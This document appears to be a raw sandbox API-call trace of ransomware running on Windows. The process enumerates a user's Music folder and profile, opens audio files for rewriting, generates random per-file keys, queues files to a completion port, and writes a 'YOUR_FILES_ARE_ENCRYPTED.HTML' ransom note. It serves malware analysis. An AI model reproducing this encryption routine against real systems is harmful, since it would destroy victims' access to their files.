GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=87474) returned 1 [0124.946] GetProcessHeap () returned 0x600000 [0124.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0124.948] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="78") returned 2 [0124.948] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="F0") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="23") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="E6") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="B3") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="B2") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="B4") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="36") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="B0") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="8F") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="12") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="C8") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="43") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="9C") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="95") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="81") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="31") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="53") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="BA") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="56") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="27") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="A1") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="17") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="C4") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="4E") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="9E") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="CD") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="85") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="33") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="1B") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="88") returned 2 [0124.948] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="41") returned 2 [0124.949] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3" [0124.949] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.949] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0124.953] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56986f0, ftCreationTime.dwHighDateTime=0x1d70139, ftLastAccessTime.dwLowDateTime=0x80ea8b70, ftLastAccessTime.dwHighDateTime=0x1d70664, ftLastWriteTime.dwLowDateTime=0x80ea8b70, ftLastWriteTime.dwHighDateTime=0x1d70664, nFileSizeHigh=0x0, nFileSizeLow=0xdb45, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="y6PBxRBH6LV1qa4 3et.m4a", cAlternateFileName="Y6PBXR~1.M4A")) returned 1 [0124.953] StrStrIW (lpFirst="y6PBxRBH6LV1qa4 3et.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.953] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a") returned 55 [0124.953] PathFindExtensionW (pszPath="y6PBxRBH6LV1qa4 3et.m4a") returned=".m4a" [0124.953] lstrlenW (lpString=".m4a") returned 4 [0124.953] PathFindExtensionW (pszPath="y6PBxRBH6LV1qa4 3et.m4a") returned=".m4a" [0124.953] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\y6pbxrbh6lv1qa4 3et.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.954] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=56133) returned 1 [0124.954] GetProcessHeap () returned 0x600000 [0124.954] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0124.954] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A4") returned 2 [0124.954] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="93") returned 2 [0124.954] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="F5") returned 2 [0124.954] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="C2") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="14") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F4") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="8C") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="D8") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="15") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="6A") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="C2") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="48") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F1") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="AD") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="BB") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="68") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="7F") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="1C") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="FF") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="B3") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="82") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C5") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="FC") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="1D") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="BA") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="CE") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="BB") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="09") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="F0") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="CD") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="1E") returned 2 [0124.955] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7D") returned 2 [0124.956] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\y6PBxRBH6LV1qa4 3et.m4a" [0124.956] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.956] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0124.976] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c16150, ftCreationTime.dwHighDateTime=0x1d6fbcd, ftLastAccessTime.dwLowDateTime=0xb72327a0, ftLastAccessTime.dwHighDateTime=0x1d70a43, ftLastWriteTime.dwLowDateTime=0xb72327a0, ftLastWriteTime.dwHighDateTime=0x1d70a43, nFileSizeHigh=0x0, nFileSizeLow=0xac4e, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="_r 1WSjC4hA.m4a", cAlternateFileName="_R1WSJ~1.M4A")) returned 1 [0124.976] StrStrIW (lpFirst="_r 1WSjC4hA.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.976] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a") returned 47 [0124.976] PathFindExtensionW (pszPath="_r 1WSjC4hA.m4a") returned=".m4a" [0124.976] lstrlenW (lpString=".m4a") returned 4 [0124.976] PathFindExtensionW (pszPath="_r 1WSjC4hA.m4a") returned=".m4a" [0124.976] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\_r 1wsjc4ha.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.977] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=44110) returned 1 [0124.977] GetProcessHeap () returned 0x600000 [0124.977] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.005] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="D2") returned 2 [0125.005] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="49") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="60") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="56") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="74") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="D5") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="58") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="C4") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="F0") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="48") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="30") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="AF") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="3B") returned 2 [0125.005] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="04") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="46") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="FD") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="76") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="89") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="2D") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="B4") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="A4") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="F4") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="7F") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="27") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="02") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="4D") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F6") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="DE") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="16") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C0") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="72") returned 2 [0125.006] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="37") returned 2 [0125.006] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\_r 1WSjC4hA.m4a" [0125.006] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.007] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.011] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c16150, ftCreationTime.dwHighDateTime=0x1d6fbcd, ftLastAccessTime.dwLowDateTime=0xb72327a0, ftLastAccessTime.dwHighDateTime=0x1d70a43, ftLastWriteTime.dwLowDateTime=0xb72327a0, ftLastWriteTime.dwHighDateTime=0x1d70a43, nFileSizeHigh=0x0, nFileSizeLow=0xac4e, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="_r 1WSjC4hA.m4a", cAlternateFileName="_R1WSJ~1.M4A")) returned 0 [0125.011] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0125.011] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0125.011] GetProcessHeap () returned 0x600000 [0125.011] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.013] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.014] CloseHandle (hObject=0x314) returned 1 [0125.014] GetProcessHeap () returned 0x600000 [0125.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.014] GetProcessHeap () returned 0x600000 [0125.014] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.016] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0125.016] StrStrIW (lpFirst="My Documents", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.016] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents") returned 38 [0125.016] GetProcessHeap () returned 0x600000 [0125.016] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.016] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents" [0125.016] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents\\*" [0125.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\My Documents\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c16150, ftCreationTime.dwHighDateTime=0x1d6fbcd, ftLastAccessTime.dwLowDateTime=0xb72327a0, ftLastAccessTime.dwHighDateTime=0x1d70a43, ftLastWriteTime.dwLowDateTime=0xb72327a0, ftLastWriteTime.dwHighDateTime=0x1d70a43, nFileSizeHigh=0x0, nFileSizeLow=0xac4e, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="_r 1WSjC4hA.m4a", cAlternateFileName="翿")) returned 0xffffffff [0125.017] GetProcessHeap () returned 0x600000 [0125.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.017] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NetHood", cAlternateFileName="")) returned 1 [0125.017] StrStrIW (lpFirst="NetHood", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.017] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood") returned 33 [0125.017] GetProcessHeap () returned 0x600000 [0125.017] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.017] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood" [0125.017] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood\\*" [0125.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NetHood\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c16150, ftCreationTime.dwHighDateTime=0x1d6fbcd, ftLastAccessTime.dwLowDateTime=0xb72327a0, ftLastAccessTime.dwHighDateTime=0x1d70a43, ftLastWriteTime.dwLowDateTime=0xb72327a0, ftLastWriteTime.dwHighDateTime=0x1d70a43, nFileSizeHigh=0x0, nFileSizeLow=0xac4e, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="_r 1WSjC4hA.m4a", cAlternateFileName="翿")) returned 0xffffffff [0125.017] GetProcessHeap () returned 0x600000 [0125.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.017] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x91bfd716, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x91bfd716, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0125.017] StrStrIW (lpFirst="NTUSER.DAT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.017] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT") returned 36 [0125.017] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0125.017] lstrlenW (lpString=".DAT") returned 4 [0125.017] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0125.017] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x72000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0125.017] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.017] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1") returned 41 [0125.017] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0125.017] lstrlenW (lpString=".LOG1") returned 5 [0125.017] PathFindExtensionW (pszPath="ntuser.dat.LOG1") returned=".LOG1" [0125.017] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x6d000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0125.017] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.018] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2") returned 41 [0125.018] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0125.018] lstrlenW (lpString=".LOG2") returned 5 [0125.018] PathFindExtensionW (pszPath="ntuser.dat.LOG2") returned=".LOG2" [0125.018] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0125.018] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.018] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned 81 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned=".blf" [0125.018] lstrlenW (lpString=".blf") returned 4 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf") returned=".blf" [0125.018] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0125.018] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.018] 